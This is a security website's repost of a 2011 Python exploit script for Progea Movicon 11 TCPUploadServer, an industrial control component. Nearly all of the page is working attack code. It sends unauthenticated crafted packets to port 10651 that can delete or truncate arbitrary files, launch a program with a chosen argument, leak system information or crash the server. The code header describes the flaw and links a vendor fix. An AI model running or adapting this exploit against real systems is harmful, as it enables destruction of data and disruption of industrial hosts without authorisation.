首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Progea Movicon 11 TCPUploadServer Remote Exploit
来源:jbrown at patchtuesday dot org 作者:Brown 发布时间:2011-03-24  

#!/usr/bin/python
# movi.py
# Progea Movicon TCPUploadServer Remote Exploit
# Jeremy Brown / jbrown at patchtuesday dot org
# Mar 2011
#
# TCPUploadServer allows remote users to execute functions on the server
# without any form of authentication. Impacts include deletion of arbitrary
# files, execution of a program with an arbitrary argument, crashing the
# server, information disclosure, and more. This design flaw puts the host
# running this server at risk of potentially unauthorized functions being
# executed on the system.
#
# Tested on Progea Movicon 11 TCPUploadServer running on Windows
#
# Fix: http://support.progea.com/download/Mov11.2_Setup.zip
#

import sys
import socket

hdr="MovX"

funcs=(1,2,3,4,5,6,7,8) # "B" is listed as 8 only for convience. other functions include (the real) 8, 9, A, and V

if len(sys.argv)<3:
     print "Progea Movicon TCPUploadServer Remote Exploit"
     print "Usage: %s <target> <function> [data]"%sys.argv[0]
     print "\nWhat would you like to do?\n"
     print "[1] Create a folder"
     print "[2] Overwrite a file with NULL and cause 100%% CPU"
     print "[3] Delete a file"
     print "[4] Execute moviconRunTime.exe with a specified argument"
     print "[5] Create a desktop shortcut"
     print "[6] Retrieve drive information"
     print "[7] Retrieve os service pack"
     print "[8] Crash the server\n"
     print "* Default data is \"test\""
     sys.exit(0)

target=sys.argv[1]
port=10651
cs=target,port

func=int(sys.argv[2])

if len(sys.argv)==4:
     data=sys.argv[3]
else:
     data="test"

if func not in funcs:
     print "Invalid function"
     sys.exit(1)

if(func==1):
     print "Crafting a packet to create the folder \"%s\"..."%data
     pkt=hdr+"1"+"B"+data+"\x00"*(66-len(data))

elif(func==2):
     print "Crafting a packet to truncate (or create) the file \"%s\" to 0 bytes and cause 100%% CPU..."%data
     pkt=hdr+"2"+"B"+data+"\x00"*(66-len(data))
     # O_RDWR|O_CREAT|O_TRUNC, might be more to this, it's supposedly a copy function, but i'm moving on

elif(func==3):
     print "Crafting a packet to delete the file \"%s\"..."%data
     pkt=hdr+"3"+"B"+data+"\x00"*(66-len(data))

elif(func==4):
     print "Crafting a packet to execute moviconRunTime.exe with the argument \"%s\"..."%data
     pkt=hdr+"4"+"BB"+data+"\x00"*(65-len(data))

elif(func==5):
     print "Crafting a packet to create a desktop shortcut with the name (also appended to the link path) \"%s\"..."%data
     pkt=hdr+"5"+"B"+data+"\x00"*(66-len(data))

elif(func==6):
     print "Crafting a packet to retrieve drive information..."
     pkt=hdr+"6"+"\x01"

elif(func==7):
     print "Crafting a packet to retrieve os service pack..."
     pkt=hdr+"7"+"\x00"

elif(func==8):
     print "Crafting a packet to crash the server..."
     pkt=hdr+"B"+"\x00"

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)

sock.send(pkt)
sock.send(pkt)

print "\nPacket sent!"

if((func==6)|(func==7)):
     info=sock.recv(128)
    
     if(info):
          print "\nRetrieved info:\n"
          if(func==6):
               print "%s"%info[6:]
          elif(func==7):
               print "%s"%info[22:]
     else:
          print "\nNo info"

sock.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IGSS 8 ODBC Server Multiple Re
·Constructr CMS 3.03 Arbitrary
·VMCPlayer 1.0 Denial of Servic
·PostgreSQL for Microsoft Windo
·Distributed Ruby send syscall
·HP OpenView Network Node Manag
·HP NNM CGI webappmon.exe OvJav
·HP OpenView Network Node Manag
·HP OpenView NNM nnmRptConfig n
·HP OpenView Network Node Manag
·Adobe Flash Player AVM Bytecod
·HP OpenView NNM nnmRptConfig.e
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved